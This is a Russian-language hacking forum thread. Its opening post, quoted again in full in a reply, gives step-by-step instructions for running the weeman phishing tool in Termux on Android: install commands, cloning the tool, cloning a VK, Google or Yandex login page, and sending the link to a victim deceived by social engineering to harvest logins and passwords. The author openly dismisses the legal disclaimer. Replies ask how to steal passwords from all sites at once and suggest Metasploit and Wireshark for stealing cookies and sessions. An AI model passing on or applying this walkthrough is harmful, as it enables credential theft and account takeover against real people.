Взлом социальных сетей через локалку на андроиде (Фишинг)

ShadowMaXD

ИНТЕРЕСУЮЩИЙСЯ
Регистрация
21 Июл 2022
Сообщения
41
Реакции
12
Цитата: "Сразу же хочу сказать, что предложенная внизу информация предоставлена только для ознакомления и с целью обезопасить людей от мошенничества в сети. Использование ее в личных целях карается УК РФ" (но нам похуй :) )


История такая : Есть ноут с кали , ну на нем работаю ломаю все удаленно . Задался вопросом можно ли поставить линукс на мобилу , не прошивая ядра и без "выебонов" ? Ведь телефон таскать в кармане гораздо проще, чем ноут ) , для фишинга по локалке особенно . Кароче нашел такую тему - Termux
Скачать ее можно в плей маркете .

Посмотреть вложение 8451

Использовать будем программу weeman она позволяет создать фишинг сайт в локальной сети )

Для начала запускаем сам терминал temux , перед нами появляется черное окно , в котором написано пару строк приветствия и инструкции по установке пакетов.

Для работы вимана нам нужны пакеты : github и python2

Для начала обновим уже существующие пакеты , вводим в консоль две команды последовательно:

$ apt update
$ apt install


Далее github :

$ apt install git

Посмотреть вложение 8454

Появляется вопрос "Do yo want to contiune? [Y/n]" Соглашаемся написав "y" и нажав enter .

После гитхаба ставим питон2 :

$ apt install python2

Снова появиться вопрос "Do yo want to contiune? [Y/n]". Поступаем аналогично.

Теперь качаем сам weeman

$ git clone https://github.com/evait-security/weeman

После того, как он установится - запускаем его. Для этого вводим команду:

$ ls

Она выводит содержимое каталогов.

Посмотреть вложение 8455

Теперь:

$ cd weeman
$ ls


Тут находятся файлы программы

Посмотреть вложение 8456

Это на подобии папки с программой в винодовс , только у приложения расширение не .exe , а .py , запускаем weeman:

$ python2 weeman.py

Если у вас появилось это, то вы на верном пути:

Посмотреть вложение 8458

Команда для вызова помощи:

weeman > help

Посмотреть вложение 8462

Займемся настройкой )
Для этого пишем :

weeman > set url (Адрес любой страницы авторизации , хоть вк , хоть гугл , можно яндекс)
weeman > set port (Указываем порт , лично я указываю 8080)
weeman > set action_url (Тут указываем страницу , на которую должно перекинуть жертву после "Авторизации" )


Если есть желание , можно проверить наши настройки:

weeman > show

Если все верно , то продолжаем .
Пишим:

weeman > run

Для запуска :

Получаем адрес , он написан в конце фиолетовыми буквами и имеет вид:

http://localhost:8080 (в конце порт "8080" у вас будет тот , который вы ввели в set port , настоятельно рекомендую 8080 )

Этот адрес кидаем жертве , перед этим наебав ее с помощью СИ , а в терминале видим log pass :

Посмотреть вложение 8461

Profit!

Строго прошу не судить , это первая моя тема (которая не является вопросом) , знаю что многие знают про это , но не все :) , развиваюсь как могу ))

Надеюсь на солидарность тех, кому понравилась тема ) Не жалко ? Влепи симпу бро )
 
И этот кстати, применимо не только на мобиле... ксати классный скриптик.
 
И этот кстати, применимо не только на мобиле... ксати классный скриптик.
Да знаю что не только на мобиле , я изначально сказал, что искал способ наиболее удобный )
 
Можно сделать так, чтобы со всех сайтов одновременно тырил пароли?
 
Цитата: "Сразу же хочу сказать, что предложенная внизу информация предоставлена только для ознакомления и с целью обезопасить людей от мошенничества в сети. Использование ее в личных целях карается УК РФ" (но нам похуй :) )


История такая : Есть ноут с кали , ну на нем работаю ломаю все удаленно . Задался вопросом можно ли поставить линукс на мобилу , не прошивая ядра и без "выебонов" ? Ведь телефон таскать в кармане гораздо проще, чем ноут ) , для фишинга по локалке особенно . Кароче нашел такую тему - Termux
Скачать ее можно в плей маркете .

Посмотреть вложение 8451

Использовать будем программу weeman она позволяет создать фишинг сайт в локальной сети )

Для начала запускаем сам терминал temux , перед нами появляется черное окно , в котором написано пару строк приветствия и инструкции по установке пакетов.

Для работы вимана нам нужны пакеты : github и python2

Для начала обновим уже существующие пакеты , вводим в консоль две команды последовательно:

$ apt update
$ apt install


Далее github :

$ apt install git

Посмотреть вложение 8454

Появляется вопрос "Do yo want to contiune? [Y/n]" Соглашаемся написав "y" и нажав enter .

После гитхаба ставим питон2 :

$ apt install python2

Снова появиться вопрос "Do yo want to contiune? [Y/n]". Поступаем аналогично.

Теперь качаем сам weeman

$ git clone https://github.com/evait-security/weeman

После того, как он установится - запускаем его. Для этого вводим команду:

$ ls

Она выводит содержимое каталогов.

Посмотреть вложение 8455

Теперь:

$ cd weeman
$ ls


Тут находятся файлы программы

Посмотреть вложение 8456

Это на подобии папки с программой в винодовс , только у приложения расширение не .exe , а .py , запускаем weeman:

$ python2 weeman.py

Если у вас появилось это, то вы на верном пути:

Посмотреть вложение 8458

Команда для вызова помощи:

weeman > help

Посмотреть вложение 8462

Займемся настройкой )
Для этого пишем :

weeman > set url (Адрес любой страницы авторизации , хоть вк , хоть гугл , можно яндекс)
weeman > set port (Указываем порт , лично я указываю 8080)
weeman > set action_url (Тут указываем страницу , на которую должно перекинуть жертву после "Авторизации" )


Если есть желание , можно проверить наши настройки:

weeman > show

Если все верно , то продолжаем .
Пишим:

weeman > run

Для запуска :

Получаем адрес , он написан в конце фиолетовыми буквами и имеет вид:

http://localhost:8080 (в конце порт "8080" у вас будет тот , который вы ввели в set port , настоятельно рекомендую 8080 )

Этот адрес кидаем жертве , перед этим наебав ее с помощью СИ , а в терминале видим log pass :

Посмотреть вложение 8461

Profit!

Строго прошу не судить , это первая моя тема (которая не является вопросом) , знаю что многие знают про это , но не все :) , развиваюсь как могу ))

Надеюсь на солидарность тех, кому понравилась тема ) Не жалко ? Влепи симпу бро )

ТС - перезалей картинки пожалуйста.
 
Можно сделать так, чтобы со всех сайтов одновременно тырил пароли?

В таком случае уже нужно не скрипт использовать, а Metasploit в скупе с Wireshark, где ты сможешь воровать куки и сессию пользователя.

P.S. Добавлю информацию, на Ведро есть программа cSploit, мини версия Metasploit'а, так же есть вариант наката ядра Kali на смартфон, но это доступно не для всех Ведроидов.
 
Можно сделать так, чтобы со всех сайтов одновременно тырил пароли?
Можно в термуксе открыть много окон и каждое настроить как в статье но на разеые сайты вот и все.
 
Назад
Сверху